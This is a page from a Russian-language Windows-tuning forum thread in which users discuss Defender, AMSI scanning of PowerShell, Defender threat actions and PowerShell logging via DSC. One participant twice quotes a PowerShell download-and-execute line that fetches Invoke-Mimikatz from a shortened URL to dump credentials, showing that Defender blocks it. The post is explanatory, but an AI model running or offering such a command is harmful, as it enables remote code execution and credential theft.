Перейти из форума на сайт.

НовостиФайловые архивы
ПоискАктивные темыТоп лист
ПравилаКто в on-line?
Вход Забыли пароль? Первый раз на этом сайте? Регистрация
Компьютерный форум Ru.Board » Операционные системы » Microsoft Windows » Быстрая настройка Windows (рабочее место)

Модерирует : KLASS, IFkO

 Версия для печати • ПодписатьсяДобавить в закладки
Страницы: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147

Открыть новую тему     Написать ответ в эту тему

KLASS



Moderator
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
Есть всем известный батник из архива AutoSettings.zip от westlife, который предназначен для отключения свистелок и перделок в LTSB2016 (см. ниже сценарии PowerShell для LTSC RS5).
Сам использую этот батник для полной настройки системы после установки, добавляя в него свои команды и используя свои батники\файлы_реестра\PowerShell.
Пока не реализовано через батник:
Рабочий стол\ПКМ\Вид\Мелкие значки решено
Отключить параметр: Параметры\Персонализация\Пуск\Показывать недавно добавленные приложения (регулировка данной настройки через MDM добавлена только в Windows 10, version 1703
Удалить драйверы и отключить AMDA00 Interface в диспетчере устройств, чтобы не было ошибки 'Сбой загрузки драйвера \Driver\WUDFRd для устройства ACPI\PNP0A0A\2&daba3ff&0.'
======
Предлагаю в теме делиться своими наработками по быстрой настройке системы, используя батники, сценарии PowerShell и файлы реестра.
Если при выполнении батника в окне CMD появились кракозябры или не все отображается, измените шрифт окна CMD на Consolas
 
Закладки (bookmarks) по реестру Windows 10 для программы Registry Finder.
Какой раздел реестра использовать при создании рег-файлов CurrentControlSet или ControlSetNNN
Group Policy Settings Reference Spreadsheet Windows 1809 (Справочная таблица параметров ГП. Вышла новая версия системы, меняем цифры и в поиск Google)
 
Мой антивирусник ругается (удаляет) сценарий (батник)...
 
Сценарии PowerShell:
От farag для настройки Windows 10 1809 Enterprise LTSC и строго 2004 (20H1)/2009 (20H2)
Импорт виртуальных машин в Диспетчер Hyper-V
Ассоциация файлов PowerShell и запуск неподписанных скриптов. Smitis (C)
AutoSettingsPS от westlife для настройки Windows 10 RS5-20H2 x86-x64
 
Смежные темы:
Реестр Windows 10 (только редактор реестра)
Сценарии Windows
Самостоятельная сборка дистрибутивов, например, используя RepackWIMPS от westlife
Бесконтрольность Windows 10 <- в той же теме обсуждаем шапку этой темы, здесь только настройка установленной системы.
 
Поиск разработчика на WPF
Доделать проект
 
Установка приложений оффлайн. Нестандартные методы
Как на самом деле работают UWP-приложения
 
Не просите готовые\полные сценарии для настройки очередной версии ОС, если их нет, значит над ними пока работают. "Скоро только кошки родятся" (С)

Всего записей: 9126 | Зарегистр. 12-10-2001 | Отправлено: 09:39 23-05-2017 | Исправлено: westlife, 17:53 26-01-2021
LevT



Запрет на пост
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
Вопрос по настройке антивируса
http://forum.ru-board.com/topic.cgi?forum=62&topic=30859&start=260#13
 
Зачем нужно его настраивать, а недостаточно отключить?
Допустим вы (при ослабенной ExecutionPolicy) сдуру кликнули на что-то типа
(особенно если опрометчиво ассоциировали ps1, назло MS)
 

Код:
 
IEX (New-Object Net.WebClient).DownloadString('http://is.gd/oeoFuI'); Invoke-Mimikatz -DumpCreds -ComputerName @('LON-SVR1')
 
 
 
Перед самым исполнением деобфусцированного кода тот передаётся дефендеру для проверки - так что дефендер на такое заругается.

Всего записей: 14560 | Зарегистр. 14-10-2001 | Отправлено: 12:13 13-07-2018 | Исправлено: LevT, 12:28 13-07-2018
KLASS



Moderator
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
LevT

Цитата:
Допустим вы (при ослабенной ExecutionPolicy)

Допустим ты, ослабляешь при выполнении определенного сценария, не?

Всего записей: 9126 | Зарегистр. 12-10-2001 | Отправлено: 13:01 13-07-2018
LevT



Запрет на пост
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
KLASS
да нет, конечно. Ослабляю всегда, потому что занимаюсь разработкой.
Будучи ограничен политикой, хрен импортируешь какой-нибудь модуль из гитхабовских исходников и вообще неподписанный.
 
Надавно словил дома шифровальщика. Это третий вирь словленный за всю жизнь - но этот раз гимор с последствиями особо впечатлил.  
Вряд ли использовался Powershell, но я на всякий случай прошёл онлайн-курс по его секьюрити и вынесенным оттуда делюсь.

Всего записей: 14560 | Зарегистр. 14-10-2001 | Отправлено: 13:08 13-07-2018 | Исправлено: LevT, 13:11 13-07-2018
KLASS



Moderator
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору

Цитата:
Надавно словил дома шифровальщика.

Порядок действий не помнишь, шифровальщик не сохранился?
Что-ты мог такое жамкать бездумно, прости.
Хочу )

Всего записей: 9126 | Зарегистр. 12-10-2001 | Отправлено: 13:14 13-07-2018
LevT



Запрет на пост
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
KLASS
я думаю, что я просрал RDP.
Сложилось сразу несколько факторов, каждого из которых умельцу достаточно.
 
 
Добавлено:
 
Кстати, кто пользуется другими антивирусами кроме дефендера - проверьте что напишет
 

Код:
 
PS C:\Windows\system32> IEX (New-Object Net.WebClient).DownloadString('http://is.gd/oeoFuI');
IEX : At line:1 char:1
+ function Invoke-Mimikatz
+ ~~~~~~~~~~~~~~~~~~~~~~~~
This script contains malicious content and has been blocked by your antivirus software.
At line:1 char:1
+ IEX (New-Object Net.WebClient).DownloadString('http://is.gd/oeoFuI');
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ParserError: ( [Invoke-Expression], ParseException
    + FullyQualifiedErrorId : ScriptContainedMaliciousContent,Microsoft.PowerShell.Commands.InvokeExpressionCommand
 

 
 
Добавлено:
 
https://www.techrepublic.com/article/using-powershell-to-investigate-windows-defenders-malware-signature-definitions-database/
 
SeverityID
The SeverityID value identifies how dangerous the threat is on a scale of 1-5. The values are described in the following table.
ID
Severity
0 Unknown
1 Low
2 Moderate
4 High
5 Severe
(I'm not sure what happened to SeverityID 3.)
 
Кто-нибудь настраивал встроенную реакцию дефендера на эти "уровни опасности".
Пошиковский хелп вводит в заблуждение: там не по три текстовых варианта, а по семь целочисленных (но ощущение такое, что работают не все)
 
Clean (1)  
Quarantine (2)  
Remove (3)  
Allow (6)  
UserDefined (8)  
NoAction (9)  
Block (10)  
 
 
https://www.rootusers.com/configure-windows-defender-scans-using-windows-powershell/

Всего записей: 14560 | Зарегистр. 14-10-2001 | Отправлено: 13:22 13-07-2018 | Исправлено: LevT, 13:51 13-07-2018
KLASS



Moderator
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
LevT

Цитата:
но не нахожу способа автоматизировать возврат пожранного на место


Код:
"%ProgramFiles%\Windows Defender\mpcmdrun.exe" -restore -all

И даже работает )

Цитата:
Restoring the following quarantined items:
 
ThreatName = HackTool:Win32/Mailpassview
   file:C:\Programs\NirLauncher\NirSoft\mailpv.exe quarantined at 14.07.2018 6:10:02 (UTC) was restored

А вобще то защитник в новых версиях выни по умолчанию не шлет сразу в карантин, но ждет, когда ты ему задашь действие.

Не пользуюсь я Защитником, может чего пропустил?
 
Добавлено:
PS
Возможно в автоматическом режиме Защитник шлет в карантин найденные угрозы, а я тупо по ПКМ каталог просканил и Защитник ждет моих указаний...
 
Добавлено:

Цитата:
да нет, конечно. Ослабляю всегда, потому что занимаюсь разработкой.  

Это типа разработчик теперь менее защищен получается... тяжело видать разработчику.
Ну а, если по-разрабатывал (прости Господи) и включил безопасность по умолчанию, дабы не
просирать

Цитата:
я думаю, что я просрал RDP

 
Добавлено:

Цитата:
Кстати, кто пользуется другими антивирусами кроме дефендера

Не кстати это здесь... пикчу туда положил.

Всего записей: 9126 | Зарегистр. 12-10-2001 | Отправлено: 08:53 14-07-2018 | Исправлено: KLASS, 09:22 14-07-2018
LevT



Запрет на пост
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
KLASS
 

Цитата:
А вобще то защитник в новых версиях выни по умолчанию не шлет сразу в карантин, но ждет, когда ты ему задашь действие.  

 
жрёт сразу, как только натыкается на папку с кигеном например, когда юзер открыл её в эксплорере
 
реакция зависит от класса угрозы - только я не видел документации, какая именно умолчательная реакция на какой класс.
 
Можно реакцию выставить вручную; я попробовал, но пока стопроцентной уверенности нет что все пункты работают.  
И им тоже не хватает документации. Чем например Allow (6) отличается от NoAction (9) ?
Я б хотел чтобы оно меня предупредило, но решение оставило мне.
 
 

Цитата:
Не кстати это здесь... пикчу туда положил.  

 
Это потому что разработчики пошика шлют все скрипты на проверку системной антималваре перед самым их исполнением (в деобфусцированном виде)
 
Системный интерфейс называется AMService.
 

Код:
Get-CimInstance -ClassName MSFT_MpComputerStatus -Namespace ROOT/Microsoft/Windows/Defender | fl AMService*
 
AMServiceEnabled : True
AMServiceVersion : 4.18.1806.18062

 
Дефендер настроен на события оттуда лаять и лочить источник - прочие антивири тоже могут реагировать (если им это интересно).
 
 

Цитата:
Это типа разработчик теперь менее защищен получается... тяжело видать разработчик

Да, так оно и есть как правило.  
Когда постоянно что-то меняешь - одно из двух: либо ты работаешь и двигаешься дальше, либо ты затыкаешь за собой дырки и окапываешься глубже (а-ля безопасник).
Разработчик и безопасник в одной голове это готовый пациент психушки: столь разные роли должны исполняться разными людьми.
 
В десятку - точнее, в свежий WMF то есть Powershell (ставится аж на 7) - встроен DSC LocalConfigurationManager - движок, который следит за соответствием оси предписанному состоянию
Вот его-то настройкой я и разбираюсь, где-то типа на полпути, и поговорить об этом по-прежнему не с кем.  
 
 
Добавлено:
 
Вот например как настраивается слежка за том, что делает Powershell
https://raw.githubusercontent.com/GoateePFE/BlogScripts/master/PSSecDSC.ps1
 
Точно так же можно описывать всё остальное
 

Всего записей: 14560 | Зарегистр. 14-10-2001 | Отправлено: 17:47 14-07-2018 | Исправлено: LevT, 19:26 14-07-2018
KLASS



Moderator
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
LevT

Цитата:
Вот например как настраивается слежка

Ты своими словами говори, а Инет у меня есть )

Всего записей: 9126 | Зарегистр. 12-10-2001 | Отправлено: 18:38 14-07-2018
LevT



Запрет на пост
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
KLASS
Спрашивай, если тебе что-то конкретно непонятно )
 
 
 
Добавлено:
Это две конфигурации локалхоста.  
 
Одна EnablePowerShellLogging включает слежку за PS,  
другая DisablePowerShellLogging отключает.
 
Как это использовать - написано прямо в простыне.
Можно вставить в ISE и запускать кусками.
(у кого не запущен winrm придется предварительно сделать Start-Service winrm)
 
 
Добавлено:
 
Правда, LCM по умолчанию только применяет конфиг пинком от Start-DscConfiguration и не настроен на автокоррекцию.
Можно и конфигурацию его самого добавить.

Всего записей: 14560 | Зарегистр. 14-10-2001 | Отправлено: 19:17 14-07-2018 | Исправлено: LevT, 20:25 14-07-2018
KLASS



Moderator
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
LevT
Мне понятно все, не понятен ты
Хочешь поговорить?
Скажи о чем? И, наконец то начни говорить, но не принуждать спрашивать тебя.
А ты нужен?

Всего записей: 9126 | Зарегистр. 12-10-2001 | Отправлено: 19:59 14-07-2018
LevT



Запрет на пост
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
KLASS
Слушай, я не могу здесь заниматься продажами: вот уж что точно не нужно )
 
Кое-что я уже знаю и умею - и готов помочь врубиться в технологию.  
Тем, кто сам видит перспективу, но боится начать.
Не птенцам, раззявившим клювы )

Всего записей: 14560 | Зарегистр. 14-10-2001 | Отправлено: 20:22 14-07-2018
KLASS



Moderator
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
LevT

Цитата:
Кое-что я уже знаю и умею

Так делись, открой тему, грамотно объясни с чего начать... не ссылками, а сам.
Попытки уже были... может мы этот разговор в ПМ, это не нарушит правил.
А я люблю правила. )

Всего записей: 9126 | Зарегистр. 12-10-2001 | Отправлено: 20:26 14-07-2018 | Исправлено: KLASS, 20:27 14-07-2018
LevT



Запрет на пост
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
Пойми: вот эта простыня, это типа шибболета фейс-контроля.
Кому-то (большинству) это "ужас-ужас, уберите его от меня".  
Ни к чему им ничего впаривать, тратить силы на обсуждение с ними "зачем всё это".
 
А кто-то вдруг увидит перспективу.  
Ну, в ПМ что ли обращайтесь. Наберётся несколько человек - откроем тему.

Всего записей: 14560 | Зарегистр. 14-10-2001 | Отправлено: 21:38 14-07-2018 | Исправлено: LevT, 21:40 14-07-2018
KLASS



Moderator
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору

Цитата:
Ни к чему им ничего впаривать

Быстрая настройка Windows никому не нужна была, просто тупо ходили, кто что-то успел прочитать. westlife фразу сказал, вы тут (сам найдешь где) ищите-это важно, а WildGoblin про брандмауэр тему объяснил, вот тема и появилась. Ты рожай уже чего, а я завсегда поддержу, знаний мало не бывает, ага )

Всего записей: 9126 | Зарегистр. 12-10-2001 | Отправлено: 21:53 14-07-2018 | Исправлено: KLASS, 21:54 14-07-2018
LevT



Запрет на пост
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
KLASS
 
Я уже пробовал в ПМ агитировать кое-кого адресно... Люди упорно хотят учиться лишь на своих ошибках: чужие им не впрок (
 
Тут такое дело: я не готов "рожать" в пустоту, враждебно-настороженную притом.  
У меня конечное количество энергии и энтузиазма, и я лучше их потрачу на дальнейшее изучение/собирание граблей
 
Тема такая на форуме мне самому станет нужна лишь тогда, когда появятся небезнадежные люди и надежда, что кто-то ещё будет вкладываться в общую копилку
(после того, как я помогу им начать/избежать первоначальных граблей).

Всего записей: 14560 | Зарегистр. 14-10-2001 | Отправлено: 22:38 14-07-2018
KLASS



Moderator
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
LevT

Цитата:
враждебно-настороженную притом

Бла-бла.

Всего записей: 9126 | Зарегистр. 12-10-2001 | Отправлено: 22:48 14-07-2018
LevT



Запрет на пост
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
KLASS
Ну вот ещё одна попытка, извини что опять на нерусском:
https://gaelcolas.com/2018/05/20/configuration-management-policy-driven-vs-imperative-transforms/
 
Если будет энтузиазм, допишу здесь перевод основных идей.
 
 
Добавлено:
Управление конфигурациями: декларативные политики против императивных инструкций.
 
 
Я покупаю машину, и обнаружил там климат-контроль, "хочу вот такую температуру".  "Сделай мне вот так"!  Это круто.
 
Напротив, у меня дома отдельные кондиционеры в каждом помещении, и я задолбался целиться пультами в каждый из них и вслушиваться, пикнул ли кондей в ответ - то есть усвоил ли мою команду.  
 Я должен дополнительно присматриваться и прислушиваться к внутреннему блоку, чтобы убедиться в том, что агрегат делает то, что я хочу.
 Когда агрегатов несколько, это натурально утомляет.
 
 А еще у меня один из пультов управляет двумя кондеями - и глядя на него в приниципе невозможно понять, какую команду он отдаст тому кондею, в который я им целюсь.
 Итак, пульт кондея - плохая и негодная система управления!  
Потому, что глядя на него невозможно понять, ЗАЧЕМ было сделано последнее изменение настроек.
 

Всего записей: 14560 | Зарегистр. 14-10-2001 | Отправлено: 02:14 15-07-2018
YuS_2



Silver Member
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
LevT  15-07-2018

Цитата:
ещё одна попытка, извини что опять на нерусском

 
 14-07-2018

Цитата:
Ты своими словами говори, а Инет у меня есть

 

Цитата:
Если будет энтузиазм, допишу здесь перевод основных идей.

Зачем? На кой фиг здесь напыщенные фразы с гигалитрами воды? Зачем здесь все эти аллегории? Ты свои мысли покажи и на конкретных примерах... а воду лить и философствовать... много энтузиазма не требуется.

Всего записей: 3150 | Зарегистр. 03-02-2009 | Отправлено: 08:58 15-07-2018
LevT



Запрет на пост
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
YuS_2
Аллегории именно затем, что человек тоже замучился "объяснять своими словами" - тем, кто слушать не хочет (почившим на лаврах самоучкам и недоучкам).
Но там хотя бы нет языкового барьера.
 
Спасибо, что остановил: потрачу сегодняшний день с бОльшим толком
 

Всего записей: 14560 | Зарегистр. 14-10-2001 | Отправлено: 10:22 15-07-2018 | Исправлено: LevT, 10:27 15-07-2018
KLASS



Moderator
Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
LevT
Не боись... "пристрелю"
Цитата:
темх, кто слушать не хочет
, ага )

Всего записей: 9126 | Зарегистр. 12-10-2001 | Отправлено: 10:50 15-07-2018
Открыть новую тему     Написать ответ в эту тему

Страницы: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147

Компьютерный форум Ru.Board » Операционные системы » Microsoft Windows » Быстрая настройка Windows (рабочее место)


Реклама на форуме Ru.Board.

Powered by Ikonboard "v2.1.7b" © 2000 Ikonboard.com
Modified by Ru.Board
© Ru.Board 2000-2020

BitCoin: 1NGG1chHtUvrtEqjeerQCKDMUi6S6CG4iC

Рейтинг.ru